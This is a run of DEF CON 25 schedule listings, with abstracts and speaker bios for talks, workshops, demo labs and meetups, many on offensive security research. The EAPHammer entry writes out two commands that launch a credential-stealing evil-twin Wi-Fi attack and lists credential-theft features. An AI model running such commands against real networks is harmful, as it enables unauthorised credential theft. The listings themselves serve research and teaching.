Patrick Wardle is the Chief Security Researcher at Synack, and founder of Objective-See. Having worked at NASA and the NSA, and presented at many security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick's focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware. In his personal time, Patrick collects OS X malware and writes free OS X security tools.

@patrickwardle, objective-see.com



SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 15:00-15:59


Title:
Death Numbers in Surgical room, Attacking Anesthesia Equipment.

1500 Friday
Michael Hudson

Possibility of introducing malicious code in General Electric's Datex-Ohmeda equipment, which is used in surgeries as anesthesia equipment. These devices monitor all vital signs during a surgical operation. The model of the monitor is the G/1500213 and it has 2 RJ-45 inputs, which connect to a PC (which in most of the hospitals visited uses a version of Windows), and from this PC to a central server. All hospitals visited use an Oracle database, the HL7 protocol and the DICOM (TCP/IP) protocol.


Wireless - Florentine BR I & II - Promenade Level - Friday - 15:00-15:55


Deceptacon: Wi-Fi Deception in under $5

No description available



DEFCON - Track 1 - Thursday - 16:00-17:45


DEF CON 101 Panel

Thursday at 16:00 in 101 Track

105 minutes | Hacker History, Audience Participation

HighWiz Founder, DC101

Malware Unicorn

Niki7a Director of Content & Coordination, DEF CON

Roamer CFP Vocal Antagonizer, DEF CON

Wiseacre

Shaggy

The DEF CON panel is the place to go to learn about the many facets of DEF CON and to begin your DEF CONian Adventure. Here you will begin your adventure that will include more than just listening in the talk tracks. You can get hands-on experience in the Villages and witness amazing feats of programming in Demo Labs. You may even display your own powers by participating in a contest or two in the Events and Contest Area. The panel will give you what you need to know to navigate DEF CON to your best advantage. We have speakers who will regale you with tales of how they came to be at DEF CON and (hopefully) inspire you with their personal experiences. Oh yeah, there is the time honored "Name the Noob", with lots of laughs and even some prizes.

HighWiz
Born of glitter and moon beams, HighWiz is the things that dreams are made of and nightmares long to be... Years ago, with the help of some very awesome people, he set about to create an event that would give the n00bs of DEF CON a place to feel welcomed and further their own pursuit of knowledge. HighWiz is the fabled Man on the Mountain whom people seek to gain a taste of his forbidden knowledge. He is a rare sighting at DEF CON only to be glimpsed by those lucky few.

Malware Unicorn
As a girl growing up, she was told she could be anything so she decided to be a unicorn. Ever since, she has made it her mission to ensure the truth is out there. Do not attempt to use malware pickup lines on her as she will pull them apart and you risk having your face impaled. Though she is fierce, she is also graceful, peaceful and determined. She is also an awesome artist.

Niki7a
There is truly only one sorceress that ensures the machinations of Def Con continue to move. She is both in tune with the magic and digital functions and is the power behind the CFP board from start to finish as well as the coordination of so many other activities behind the curtain. She works tirelessly year-round to make sure everything runs smoothly. Also, she is fun at parties and awesome AF.

@niki7a

Roamer
Appearing in a cloud of (cigarette) smoke, Roamer is a man full of whiskey and ideas. He has appeared at DEF CON since before (almost) the beginning. He is a renowned author, speaker, pontificator and is famous for giving the most entertaining Worldwide Wardrive talk. He is also the Grand Vizier of All Things Vendor - you are welcome.

Wiseacre
Wiseacre was introduced to DEF CON by Roamer. Though he appeared at his first DEF CON because of the Capture the Flag contest, Roamer and HighWiz showed him how to make DEF CON so much more than simply attending the talks. From then on he made a point to participate in as much as he could. Of course, this was all within the limits of social anxiety so, if it allowed participation as a wallflower, he was in! Now, he wants to make sure everyone else gets to know as much as possible about this year's conference. In his private life, Mike hacks managers and is happy anyone listens to him at all. Mike would like to thank Highwiz for everything.

Shaggy
Shaggy has the Voice of Barry White, the brains of Albert Einstein and the soul of Bea Arthur. He has a few philosophies on life: He believes that while the righteous keep moving forward, those with clean hands become stronger and stronger. That the field of battle between God and Satan is the human soul. It is in the soul that the battle rages every moment of life. He also believes that one should start by doing what's necessary; then do what's possible; and suddenly you are doing the impossible. Because you learn to speak by speaking, to study by studying, to run by running, to work by working, and just so, you learn to love by loving. All those who think to learn in any other way deceive themselves.



Night Life - Track 3 - Thursday - 20:30-24:00


Title:
DEF CON Movie Night


Night Life - Track 3 - Friday - 20:30-24:00


Title:
DEF CON Movie Night


Night Life - Track 3 - Saturday - 20:30-24:00


Title:
DEF CON Movie Night


Night Life - Lobby Bar - Friday - 18:00-19:00


Title:
DEFCON 25 Meetup for /r/Defcon

DEFCON 25 Meetup
Alrighty friends, it's that time again to plan out our gathering at DC25! Our meetups have steadily been gaining traction each year, and I am hoping that we can make this one our biggest one to date.
As with the past couple of years, it's always a bit tricky to find a time and a place that is going to work perfectly for everybody because of the incredible number of options for people to see/do. I am open to suggestions if you all think that there are better spots for us to meet up and socialize/drink.

Here are the details, ya filthy hackers:
Location: Lobby Bar - Caesars Palace Hotel and Casino
Date: Friday, July 28th, 2017
Time: 6:00pm
General Information: I will gather some chairs and tables in the corner of the bar and defend them with my life if necessary... Okay, maybe not my life, but I will do my best to make people too uncomfortable to sit in the area if they are not part of the meetup. And as always, please ask around for me if you can't find us or message me, I promise not to bite! And as always, please keep your snacks close by unless you want /u/1o57 to eat them.

T-Shirt Swap & Clothing Drive - In addition to our normal mingling, drinking, and general shenanigans, some of us will also be doing a T-shirt swap and clothing drive. Bring a couple shirts to swap, and any items of clothing that you would like to donate to a local charity (TBD). I will be personally bringing a trash-bag full of clothes to donate, and I would highly encourage you to bring your gently used clothes as well! Let's make an impact in the name of our sub!!

BONUS ROUND - Our afterparty will graciously be sponsored by the Monero Enterprise Alliance and our friends over at /r/Monero. Details to come.


Night Life - Sunset Park Pavilion F - Thursday - 16:00-22:00


Title:
DEFCON Toxic BBQ

Toxic BBQ will be held on Thursday afternoon, 7/27, at Sunset Park Pavilion F from 16:00 to 22:00. (36.0636, -115.1178)

The humans of Vegas invite everyone to a barbecue and meetup at Sunset Park, Pavilion F. Kick off the con on Thursday afternoon with food, beer, and conversation at this unofficial welcome party.

Basic supplies will be provided (read: burgers, dogs, charcoal, plates). Bring sides, snacks, and spirits to fill out the smorgasbord. Hit the grocery (or liquor) store before arriving, or catch a ride once you arrive. Gifts for those that chip in to make the BBQ awesome:
- Grill masters
- Supply Runners
- Those that bring exotic meats
- Those that bring exotic brews (local or home brews)
- Carpool members, ride coordination, transportation help

We are going to host local Vegas HAMmers for an impromptu meetup. If your group would like to stage at the BBQ, let me know in the comments below. PM me if you can help with supplies or transport.

Credit to graverobber and all those that made this unofficial kickoff the best place to stuff your face year after year. This is an informal meetup, and costs are covered by humans like you.

CHV - Village Talks Outside Contest Area, Pool Level - Friday - 16:00-16:59


DefCon Unofficial Badges Panel

No description available



PHV - Milano VIII - Promenade Level - Sunday - 11:10-11:59


Demystifying the OPM Breach: WTF Really Happened

Ron Taylor

In September 2016 the House Committee on Oversight finally released their report. Four years after the original breach, we are still asking how the f*#! did this happen. This talk will go over the key findings of the report and the impact on those who were affected.

Ron Taylor (Twitter: @Gu5G0rman) has been in the Information Security field for almost 20 years. Ten of those years were spent in consulting where he gained experience in many areas. In 2008, he joined the Cisco Global Certification Team as an SME in Information Assurance. In 2012, he moved into a position with the Security Research and Operations group (PSIRT) where his focus was mostly on penetration testing of Cisco products and services. He was also involved in developing and presenting security training to internal development and test teams globally. Additionally, he provided consulting support to many product teams as an SME on product security testing. In his current role, he is a Consulting Systems Engineer specializing in Cisco's security product line. Certifications include GPEN, GWEB, GCIA, GCIH, GWAPT, RHCE, CCSP, CCNA, CISSP and MCSE. Ron is also a Cisco Security Blackbelt, SANS mentor, Co-Founder and President of the Raleigh BSides Security Conference, and member of the Packet Hacking Village team at DEF CON.



DEFCON - Track 1 - Saturday - 13:00-13:45


Demystifying Windows Kernel Exploitation by Abusing GDI Objects.

Saturday at 13:00 in 101 Track

45 minutes | Demo, Exploit

5A1F (Saif El-Sherei) Security Analyst, SensePost

Windows kernel exploitation is a difficult field to get into. Learning the field well enough to write your own exploits requires full walkthroughs, and few of those exist. This talk will do that, release two exploits and a new GDI object abuse technique.

We will provide all the detailed steps taken to develop a full privilege escalation exploit. The process includes reversing a Microsoft patch, identifying and analyzing two bugs, developing PoCs to trigger them, turning them into code execution and then putting it all together. The result is an exploit for Windows 8.1 x64 using GDI bitmap objects and a new, previously unreleased Windows 7 SP1 x86 exploit built on a newly discovered GDI object abuse technique.

5A1F (Saif El-Sherei)
Saif is a senior analyst with SensePost. He has a keen interest in exploit development and sharing everything he learns. Over the years he has released several exploitation tutorials, examples and a grammar-based browser fuzzer, wadi (DEF CON 23).

@saif_sherei



BHV - Pisa Room - Saturday - 18:30-18:30


Title: Designer Babies

Speaker: Christian and Erin
@cdameffMDDr

About Christian and Erin:
Christian "quaddi" Dameff MD MS
Christian (quaddi) Dameff is an emergency medicine physician, former open capture the flag champion, prior DEF CON speaker, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. Security research topics include hacking critical healthcare infrastructure and medical devices. This is his thirteenth DEF CON.

Erin Hefley is a resident physician in her final year of training with the Phoenix Integrated Residency in Obstetrics & Gynecology. She has a background in public health and women's health, and obtained a Master of Public Health degree from the University of Northern Colorado prior to attending medical school at the University of Arizona - Phoenix. This is her 6th Defcon attendance over the past decade, and she is thrilled to have witnessed the development and expansion of the Biohacking Village. Her current interests include reproductive health technology, women's health policy, running, and vampire erotica.

Abstract:
An estimated 30 million Americans and 300 million people worldwide suffer from genetic disease, and 15% of American couples are affected by infertility. Current assisted reproductive technology is used to prevent genetic disease and assist with conception. Human capabilities are rapidly advancing past the present application of these technologies, providing exciting possibilities for selecting and enhancing characteristics of our offspring in the brave new world of 21st century medicine.
This discussion will outline current reproductive science in the US and abroad, and discuss the bioethical, legal, and medical consequences of a future where babies can be designed to specification.




Wireless - Florentine BR I & II - Promenade Level - Friday - 16:00-16:55


Robert Ghilduta

Bio

Interests include SDRs (bladeRF), RF, DSP, embedded programming, hardware design, modern control systems, UAVs, and information security.

@robertghilduta

Designing an Automatic Gain Control

Abstract

The presentation will describe the requirements and design methodology behind the bladeRF's newly released VHDL Automatic Gain Control. The talk will walk SDR beginners through the RF gain architecture of modern radios and explain why gain control is required. The talk will then use the bladeRF as an example, and show what it took to develop the AGC in VHDL.



DEFCON - Track 4 - Saturday - 15:00-15:45


Digital Vengeance: Exploiting the Most Notorious C&C Toolkits

Saturday at 15:00 in Track 4

45 minutes | Demo, Tool, Exploit

Professor Plum Hacker

Every year thousands of organizations are compromised by targeted attacks. In many cases the attacks are labeled as advanced and persistent which suggests a high level of sophistication in the attack and tools used. Many times, this title is leveraged as an excuse that the events were inevitable or irresistible, as if the assailants' skill set is well beyond what defenders are capable of. To the contrary, often these assailants are not as untouchable as many would believe.

If one looks at the many APT reports that have been released over the years, some clear patterns start to emerge. A small number of Remote Administration Tools are preferred by actors and reused across multiple campaigns. Frequently cited tools include Gh0st RAT, Plug-X, and XtremeRAT among others. Upon examination, the command and control components of these notorious RATs are riddled with vulnerabilities, vulnerabilities that can be exploited to turn the tables from hunter to hunted.

The presentation will disclose several exploits that could allow remote execution or remote information disclosure on computers running these well-known C&C components. It should serve as a warning to those actors who utilize such toolsets. That is to say, such actors live in glass houses and should stop throwing stones.

Professor Plum
Professor Plum is an experienced reverse engineer, developer, and digital forensics examiner. He holds a graduate degree in Information Security from Johns Hopkins University, and has worked numerous computer incident investigations spanning the globe. He currently works as a Senior Threat Researcher for a Fortune 500 cybersecurity company and previously worked for the Department of Defense performing vulnerability research, software development, and Computer Network Operations.

@professor__plum



ICS - Calibria - Saturday - 10:30-10:59


Title: Dissecting industrial wireless implementations.

Wireless technologies are seeing increased use on the plant floor to enable pervasive monitoring and control of processes. Off-the-shelf security tools focus on assessing the security properties of commercial and consumer protocols such as 802.11 and Bluetooth. Several new standards have emerged for use in industrial environments. In this talk, Blake will offer an introduction to Software Defined Radio (SDR) tools and their application in industrial security assessments. We will review two protocols based on 802.15.4, including industry standard WirelessHART. Blake will cover how to understand the security properties of RF protocols through integration with familiar tools such as Wireshark. The goal is to leave the audience with the knowledge to get started exploring their RF environment with GNU Radio and low-cost SDR tools and to stress the importance of including RF when threat modeling a system or facility.


Bio: Blake Johnson

Blake works on the Industrial Control System Cybersecurity Team at Mandiant. His work history includes time in the electric power generation and distribution (@AlliantEnergy) industry as well as a global retailer (@Amazon). He has been a radio hobbyist for 15 years and has been using software defined radios for security testing for the last 3.




BHV - Pisa Room - Saturday - 13:00-13:29


Title: DIYBioweapons and Regulation

Speaker: Meow Ludo Meow Meow

About Meow Ludo Meow Meow:
Meow-Ludo is the founder of biohacking in Australia, and works full time running BioFoundry. He is a full-time hacker, part-time federal political candidate, and is interested in interdisciplinary projects. He is interested in the ability of biohackers to create bioweapons and the regulations that aim to control them.

Abstract:
Meow will be presenting on the capabilities for biological weapons that are currently able to be produced in home or community bio labs. He will explore the role that emerging technologies play in drastically reducing the technological and cost barriers to creating these constructs, and suggest ways that legislation and regulation may be employed to ensure maximum freedoms and innovation coupled with effective monitoring. Make sure to get your vaccinations before attending please.




DEFCON - Track 3 - Saturday - 12:00-12:45


DNS - Devious Name Services - Destroying Privacy & Anonymity Without Your Consent

Saturday at 12:00 in Track 3

45 minutes | Art of Defense

Jim Nitterauer Senior Security Specialist, AppRiver, LLC

You've planned this engagement for weeks. Everything's mapped out. You have tested all your proxy and VPN connections. You are confident your anonymity will be protected. You fire off the first round and begin attacking your target. Suddenly something goes south. Your access to the target site is completely blocked no matter what proxy or VPN you use. Soon, your ISP contacts you reminding you of their TOS while referencing complaints from the target of your engagement. You quickly switch MAC addresses and retry only to find that you are quickly blocked again!

What happened? How were you betrayed? The culprit? Your dastardly DNS resolvers and more specifically, the use of certain EDNS0 options by those resolvers.

This presentation will cover the ways in which EDNS OPT code data can divulge details about your online activity, look at methods for discovering implementation by upstream DNS providers and discuss ways in which malicious actors can abuse these features. We will also examine steps you can take to protect yourself from these invasive disclosures.

The details covered will be only moderately technical. Having a basic understanding of RFC 6891 and general DNS processes will help in understanding. We will discuss the use of basic tools including Wireshark, Packetbeat, Graylog and Dig.

Jim Nitterauer
Jim is currently a Senior Security Specialist at AppRiver, LLC, where his team is responsible for global network deployments and manages the SecureSurf global DNS infrastructure and SecureTide global spam & virus filtering infrastructure as well as all internal applications. They also manage security operations for the entire company. He holds a CISSP certification. He is also well-versed in ethical hacking and penetration testing techniques and has been involved in technology since the late 1980s when punch cards were still a thing.

Jim has presented at NolaCon, ITEN WIRED, BSides Las Vegas, BSides Atlanta, CircleCityCon and several smaller conferences. He regularly attends national security conferences and is passionate about conveying the importance of developing, implementing and maintaining security policies for organizations. His talks convey unique and practical techniques that help attendees harden their security in practical and easy-to-deploy ways.

Jim is a senior staff member with BSides Las Vegas, a member of the ITEN WIRED Planning Committee and the president of the Florida Panhandle (ISC)2 Chapter. When not at the computer, Jim can be found working out, playing guitar, traveling or just relaxing with an adult beverage.

Twitter: @jnitterauer
LinkedIn: https://www.linkedin.com/in/jnitterauer/



Demolabs - Table 2 - Saturday - 16:00-17:50


DNS-Exfil-Suite

Nolan Berry

Cory Schwartz

Saturday from 1600-1750 at Table Two

Audience: I think the best audience here would be PenTesters, DNS Engineers and people looking to learn more about DNS based attack methods.

Our tool kit provides multiple methods of data exfiltration, infiltration and botnet command and control systems using 100% DNS traffic that is either hard to detect or impossible to detect.

https://github.com/ndberry/DNS_Exfil_Tool

Nolan Berry
DNS Engineer
-----------
Nolan has been working with DNS for 2 years and has always been very interested in security. His passion for both security and DNS has led him to work on and develop a platform for DNS exploitation in an attempt to raise awareness of known but under-appreciated security flaws.

Cory Schwartz
Site Reliability Engineer
Twitter
----------
Cory has a background in signals intelligence and processing. After graduating with a degree in cryptography he served in the Air Force and then as a government contractor supporting the intelligence community. After that he worked at Rackspace on CloudStorage and systems automation. Now he is an SRE at Twitter in San Francisco.



RCV - Palermo room, Promenade level - Sunday - 11:25-11:55


Do Tinder Bots Dream of Electric Toys? How Tinder Bots are breaking hearts all over the world, and trashing Tinder’s reputation while they’re at it.

Abstract

Tinder. The Final Frontier. Pick gorgeous (or not so gorgeous) members of your desired sex with the tip of your finger, at the comfort of your sofa, your bed, and let’s admit it - your toilet seat…

Research shows that there are 50 million active users on Tinder, who check their accounts 11 times per day and spend an average of 90 minutes per day on the app. Even celebrities, it seems. [Marie Claire]

In the name of Science, I decided to sacrifice myself and delve into the world of Tinder Dating. At first, I was detecting patterns in photos, in poses, in language and in attitude, all over the world! But suddenly something else showed up on my radar: Bots. And not just one - I was being surrounded. Imagine the heartbreak of matching 7 gorgeous women in a Scandinavian capital, only to discover that not only were they in reality bots, but they actually had an agenda!

In this talk I’ll describe the research, how I came to discover that Bots were not an isolated case, and how I uncovered the pattern behind generating the profiles. I’ll also break down the infrastructure behind the operation, and show who’s behind a campaign that spanned multiple countries and continents. I’ll give multiple examples, from Tinder as well as from other platforms, of how bots operate under the radar of the site owners and carry out their agenda.

Speaker Profile

Inbar (@inbarraz) has been teaching and lecturing about Internet Security and Reverse Engineering for nearly as long as he has been doing that himself. He started programming at the age of 9 on his Dragon 64. At 13 he got a PC, and promptly started Reverse Engineering at the age of 14. Through high-school he was a key figure in the Israeli BBS scene. He spent most of his career in the Internet and Data Security field, and the only reason he’s not in jail right now is because he chose the right side of the law at an early age.

Inbar specializes in an outside-the-box approach to analyzing security and finding vulnerabilities. From late 2011 to late 2014 he was running the Malware and Security Research at Check Point, using his extensive experience of over 20 years in the Internet and Data security fields. He has presented at a number of conferences, including Kaspersky SAS, Hack.lu, CCC, Virus Bulletin, ZeroNights, ShowMeCon, several Law Enforcement events and Check Point events.

These days, Inbar is performing fascinating research on Bots and Automated Attacks at PerimeterX, and educating both customers and the public about the subjects.



RCV - Palermo room, Promenade level - Saturday - 12:10-12:59


Domain discovery, expanding your scope like a boss

Abstract

Whether you do wide scope pentesting or bounty hunting, domain discovery is the 1st method of expanding your scope. Join Jason as he walks you through his tool chain for discovery, including subdomain scraping, bruteforce, ASN discovery, permutation scanning, automation, and more!

Speaker Profile

Jason Haddix (@Jhaddix)

I spoke at DC 23 on a talk called “how to shot web”.



DEFCON - Track 3 - Saturday - 15:00-15:45


DOOMed Point of Sale Systems

Saturday at 15:00 in Track 3

45 minutes | Demo, Exploit

trixr4skids Security Engineer

In response to public security breaches many retailers have begun efforts to minimize or completely prevent the transmission of unencrypted credit card data through their store networks and point of sale systems. While this is definitely a great improvement over the previous state of affairs, it places the security of transactions squarely in the hands of credit card terminals purchased from third party vendors. These terminals have a security posture that is often not well understood by the retail chains purchasing them. To better understand if the trust placed in these devices is warranted, the attack surface and hardening of a commonly deployed credit card terminal series is reviewed and a discussion of reverse engineered security APIs is presented. Despite the reduced attack surface of the terminals and hardened configuration, attacks that allow recovery of magstripe track data and PIN codes are demonstrated to be possible.

trixr4skids
trixr4skids is a security engineer and a recovering consultant. He enjoys hardware hacking, reverse engineering, the occasional webapp RCE, robots, beer, and of course robots that bring him beer. As a child he enjoyed taking apart everything he could get his hands on in a quest to figure out how it worked (his parents did not always appreciate this). He could never figure out what the green rectangles with the black rectangles on them did and often resorted to smashing them with a hammer to see what was inside. Since then he has learned more effective ways to go about discovering the secrets those black things are hiding and even how to make them do different things than intended. His current research projects include attacking embedded devices based on the rabbit 2000/3000 CPUs, studying the security of payment card systems, and hacking anything interesting that he can buy off eBay.

@trixr4skids



DEFCON - Track 1 - Saturday - 12:00-12:45


Driving down the rabbit hole

Saturday at 12:00 in 101 Track

45 minutes | Demo

Mickey Shkatov Security Researcher, McAfee.

Jesse Michael Security Researcher, McAfee.

Oleksandr Bazhaniuk Security Researcher

Over the past few years, cars and automotive systems have gained increasing attention as cyber-attack targets. Cars are expensive. Breaking cars can cost a lot. So how can we find vulnerabilities in a car with no budget? We’ll take you with us on a journey from zero car security validation experience through the discovery and disclosure of multiple remotely-exploitable automotive vulnerabilities. Along the way, we’ll visit a wrecking yard, reassemble (most of) a 2015 Nissan Leaf in our lab, and discuss how we picked our battles, fought them, and won. During our talk, we’ll examine the details of three different classes of vulnerabilities we found in this vehicle, how they can be exploited, and the potential ramifications to the owner of their real-world exploitation. We’ll also discuss the broader scope of the vulnerabilities discovered, how they extend beyond just this specific vehicle, and what the industry can do better to prevent these types of problems in the future.

Mickey Shkatov
Mickey Shkatov is a security researcher and a member of the McAfee Advanced Threat Research team. His areas of expertise include vulnerability research, hardware and firmware security, and embedded device security.

@HackingThings

Jesse Michael
Jesse Michael has been working in security for over a decade and is currently a member of the McAfee Advanced Threat Research team, where he spends his time causing trouble and finding low-level hardware security vulnerabilities in modern computing platforms.

@jessemichael

Oleksandr Bazhaniuk
Oleksandr Bazhaniuk is a security researcher and reverse engineer with background in automation of binary vulnerability analysis. He is also a co-founder of DCUA, the first DEF CON group in Ukraine.

@ABazhaniuk



Night Life - Track 2 - Saturday - 20:00-24:00


Title:
Drunk Hacker History


Demolabs - Table 5 - Saturday - 16:00-17:50


EAPHammer

Gabriel Ryan

Saturday from 1600-1750 at Table Five

Audience: Offensive security professionals, red teamers, penetration testers, researchers.

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate how fast this tool is, here's an example of how to set up and execute a credential stealing evil twin attack against a WPA2-TTLS network in just two commands:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds

Features:
* Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
* Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
* Perform captive portal attacks
* Built-in Responder integration
* Support for Open networks and WPA-EAP/WPA2-EAP
* No manual configuration necessary for most attacks.
* No manual configuration necessary for installation and setup process

https://github.com/s0lst1c3/eaphammer

Gabriel Ryan
Gabriel Ryan is a security consultant and researcher with a passion for wireless and infrastructure testing. He currently works for Gotham Digital Science at their New York office, where he provides full scope red team penetration testing capabilities for a diverse range of clients. He also contributes heavily to his company's research division, GDS Labs. Previously, Gabriel has worked as a penetration tester and researcher for the Virginia-based defense contractor OGSystems, and as a systems programmer for Rutgers University. He also is a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.



Workshops - ( Sold Out ) - Octavius 5 - Saturday - 10:30-14:30


Edge cases in web hacking

Saturday, 10:30 to 14:30 in Octavius 5

John Poulin Principal Application Security Consultant, nVisium

Learn how to identify, exploit, and chain web-app vulnerabilities that you don't see every day. These vulnerabilities will include Server-Side Template Injection, Serialization vulnerabilities and more. We will identify how common protection mechanisms in frameworks and languages such as Ruby on Rails, Django and PHP can be bypassed/exploited.

Prerequisites: Basic experience with common web hacking, including Cross-Site Scripting, SQL Injection, Remote Code Execution and more.

Materials: Laptop with VMware or VirtualBox.

Max students: 90 | Registration: https://dc25_poulin.eventbrite.com (Sold out!)

John Poulin
John is a Principal Application Security Consultant who specializes in web application security. John has over 9 years of experience in development, management, and code analysis of web applications. John specializes in Ruby on Rails applications, but is happy to work in any MVC framework. John is leading the development of a tool called Httpillage, which provides the ability to perform distributed attacks against web applications. He also plays a role in developing and maintaining nVisium's internal security services. John graduated from the University of Maine with a degree in Computer Science and a minor in German.



DEFCON - Track 4 - Saturday - 11:00-11:30


Evading next-gen AV using artificial intelligence

Saturday at 11:00 in Track 4

20 minutes | Demo

Hyrum Anderson Technical Director of Data Science, Endgame

Much of next-gen AV relies on machine learning to generalize to never-before-seen malware. Less well appreciated, however, is that machine learning can be susceptible to attack by, ironically, other machine learning models. In this talk, we demonstrate an AI agent trained through reinforcement learning to modify malware to evade machine learning malware detection. Reinforcement learning has produced game-changing AIs that top human level performance in the game of Go and a myriad of hacked retro Atari games (e.g., Pong). In an analogous fashion, we demonstrate an AI agent that has learned through thousands of "games" against a next-gen AV malware detector which sequence of functionality-preserving changes to perform on a Windows PE malware file so that it bypasses the detector. No math or machine learning background is required; a fundamental understanding of malware and Windows PE files is welcome; and previous experience hacking Atari Pong is a plus.

Hyrum Anderson
Hyrum Anderson is technical director of data science at Endgame, where he leads research on detecting adversaries and their tools using machine learning. Prior to joining Endgame he conducted information security and situational awareness research as a researcher at FireEye, Mandiant, Sandia National Laboratories and MIT Lincoln Laboratory. He received his PhD in Electrical Engineering (signal and image processing + machine learning) from the University of Washington and BS/MS degrees from Brigham Young University. Research interests include adversarial machine learning, deep learning, large-scale malware classification, active learning, and early time-series classification.



SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 17:00-17:59


Title:
Everything you wanted to know about orchestration but were afraid to ask.

1700 Saturday
redbeard
@brianredbeard

Who doesn't dream of getting that big score: a remote shell inside of Google. But what would it get you? The compute mechanisms of "web scale" and "cloud native" companies are often wildly unlike those of smaller companies. At Twitter Apache Mesos rules the day. Google is the mastermind behind Borg and Kubernetes (née Seven of Nine). At Facebook FBAR is one tool of many used to keep everything running.

This talk aims to give visibility into "the way things work" in the second half of the second decade of the 21st century and lemme tell you, it's not LAMP stacks anymore.


Workshops - ( Sold Out ) - Octavius 5 - Saturday - 14:30-18:30


Exploitation/Malware Forward Engineering

Saturday, 14:30 to 18:30 in Octavius 5

Sean Dillon Senior Security Analyst, RiskSense, Inc.

Zachary Harding Senior Security Analyst, RiskSense, Inc.

Windows post-exploitation is the penetrating step of every penetration test if you're on a Windows network. You're obviously swimming in shells (it's Windows after all), but you aren't in full control yet. Your best account is Network Service and you want Enterprise Admin.

Elevating privileges (either by bypassing UAC or finding local exploits), stealing tokens, pivoting to other systems, scanning the local network, dumping credentials: there are a few open source tools available for all of this, such as PowerShell Empire, Koadic C3, and Metasploit's Meterpreter. We will go through the low-level code that makes it all work.

The training will explore shellcode, COM, WMI, Windows API, and .NET, and how these open source tools bring it all together. You will walk away with the knowledge to write your own plugins for these systems, as well as your own custom malware. An in-depth understanding of antivirus detection and evasion will be included. This workshop is a focus on the code, not just the tactics.

Prerequisites: Programming knowledge in one or all of the following: x86/x64, Python, JavaScript, PowerShell, Ruby, C. Pentesting knowledge: basic Windows post-exploitation.

Materials: Bring favorite OS and code editor, Windows VMs, WiFi.

Max students: 90 | Registration: https://dc25_dillon.eventbrite.com (Sold out!)

Sean Dillon
Sean Dillon is a senior security analyst at RiskSense, Inc. He has an established research focus on attacking the Windows kernel, and was the first to reverse engineer the DOUBLEPULSAR SMB backdoor. He is a co-author of the ETERNALBLUE Metasploit module and has made other contributions to the project. He has previously been a software engineer in the avionics and insurance industries, and his favorite IDE is still GW-BASIC on DOS.

Zachary Harding
Zach Harding is a senior security analyst at RiskSense, Inc. Zach formerly served in the US Army as a combat medic. He, along with Sean Dillon and others, improved leaked NSA code to release the "ExtraBacon 2.0" Cisco ASA exploit package. He is an avid tester of every penetration tool he can get a hold of. You know the guy who's always looking for available public WiFi, or fiddling with a kiosk machine? That's Zach.


Return to Index      -     

 

DEFCON - Track 2 - Thursday - 15:20-15:40


Exploiting 0ld Mag-stripe information with New technology

Thursday at 15:20 in 101 Track 2

20 minutes | Demo, Tool, Exploit

Salvador Mendoza Hacker

A massive attack against old magnetic stripe information could be executed with precision by implementing new technology. In the past, a malicious individual could spoof magstripe data, but only in a slow and difficult way. Brute force attacks were likewise tedious and time-consuming. Technology like Bluetooth could be used today to mount a persistent attack against multiple magnetic card readers at the same time with audio spoofing.

Private companies, banks, trains, subways, hotels, schools and many other services are still using magstripe information to make monetary transactions, authorize access, or even to generate "new" protocols like MST (Magnetic Secure Transmission). For decades the exploitation of magstripe information was an acceptable risk for many companies because achieving massive simultaneous attacks was not feasible. But today is different.

Transmitting magstripe information in audio files is the fastest and easiest way to make a cross-platform magstripe spoofer. But how could an attacker transmit the audio spoof information to many magnetic card readers at the same time? In this talk, we will discuss how an attacker could send specific data or build a magstripe jammer for credit card terminals, PoS or any card reader. We will also discuss how it could be used to generate brute force attacks against hotel door locks or tokenization processes, as examples.

Salvador Mendoza
Salvador Mendoza is a security researcher focusing on tokenization processes, mag-stripe information and embedded prototypes. He has presented on tokenization flaws and payment methods at Black Hat USA, DEF CON, DerbyCon, Ekoparty, BugCON and Troopers. Salvador has designed different tools to pentest mag-stripe and tokenization processes. His toolset includes MagSpoofPI, JamSpay, TokenGet and, most recently, SamyKam.

@Netxing
Blog: salmg.net


Return to Index      -     

 

DEFCON - Track 3 - Sunday - 11:00-11:45


Exploiting Continuous Integration (CI) and Automated Build systems

Sunday at 11:00 in Track 3

45 minutes | Demo, Tool, Exploit

spaceB0x Sr. Security Engineer at LeanKit Inc.

Continuous Integration (CI) systems and similar architectures have taken a new direction, especially in the last few years. Automating code builds, tests, and deployments is helping hordes of developers release code, and is saving companies a great amount of time and resources. But at what cost? The sudden and strong demand for these systems has created some widely adopted practices that have large security implications, especially if these systems are hosted internally. I have developed a tool that will help automate some offensive testing against certain popular CI build systems. There has been a large adoption of initiating these builds through web hooks of various kinds, especially changes to public facing code repositories.

I will start with a brief overview of some of the more popular CI tools and how they are being used in many organizations. This is good information for understanding, at a high level, the purpose of these systems as well as some security benefits that they can provide. From there we will dive into specific examples of how these different CI implementations have created vulnerabilities (in one case for a CI vendor themselves). Last we will explore the tool, its purpose, and a demonstration of its use. This tool takes advantage of the configurations of various components of the build chain to look for vulnerabilities. It then has the capability to exploit, persist access in, and command and control vulnerable build containers.

Most of the demonstration will revolve around specific CI products and repositories; however, the concepts are applicable across most build systems. The goal here is to encourage further exploration of these exploitation concepts. The tool is built "modularly" to facilitate this. If you are new to CI and automated build systems, or if you have been doing it for years, this talk and tool will help you to better secure your architecture.

spaceB0x
spaceB0x is extremely dedicated to his work in information security. He is the Sr. Security Engineer at a software company called LeanKit. He likes, and occasionally succeeds at, security dev-opsing, web application and network penetration testing, and some other security things. He has written tools for secure key management within automation infrastructures, capturing netflow data, and pwning automated build systems. He loves the hacker community, learning new things, and exploring new ideas.

@spaceB0xx
Website: www.untamedtheory.com


Return to Index      -     

 

